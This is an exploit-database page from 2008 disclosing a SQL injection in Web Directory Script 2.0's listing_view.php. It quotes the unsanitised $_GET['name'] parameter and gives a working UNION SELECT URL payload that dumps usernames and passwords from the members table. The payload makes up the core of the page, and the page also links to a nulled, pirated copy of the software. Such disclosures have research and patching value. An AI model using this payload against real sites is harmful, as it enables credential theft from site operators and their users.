Web Directory Script <= 2.0 (name) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Web Directory Script <= 2.0 (name) SQL Injection Vulnerability
# Published : 2008-08-25
# Author : ~!Dok_tOR!~
# Previous Title : Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities
# Next Title : Pluck CMS 4.5.2 Multiple Local File Inclusion Vulnerabilities

Web Directory Script <= 2.0 SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz 
Home Page: www.antichat.ru
Date found: 23.08.08
Product: Web Directory Script
Version: 2.0
Download script: http://rapidshare.com/files/121448809/W3bDirScr2-nullscript.net.rar
Password: nullscript.net
Vulnerability Class: SQL Injection

listing_view.php

Vuln code:

$friendly_url=$_GET['name'];

http://localhost/[installdir]/

magic_quotes_gpc = Off

Exploit:

listing_view.php?name='+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+members/*

Thanks: Zitt, rijy, Koller, NOmeR1, $n@]<e, n0ne, +toxa+, [cash], ettee, HiM@S and All members of antichat.ru and xaker.name .

# www.Syue.com [2008-08-25]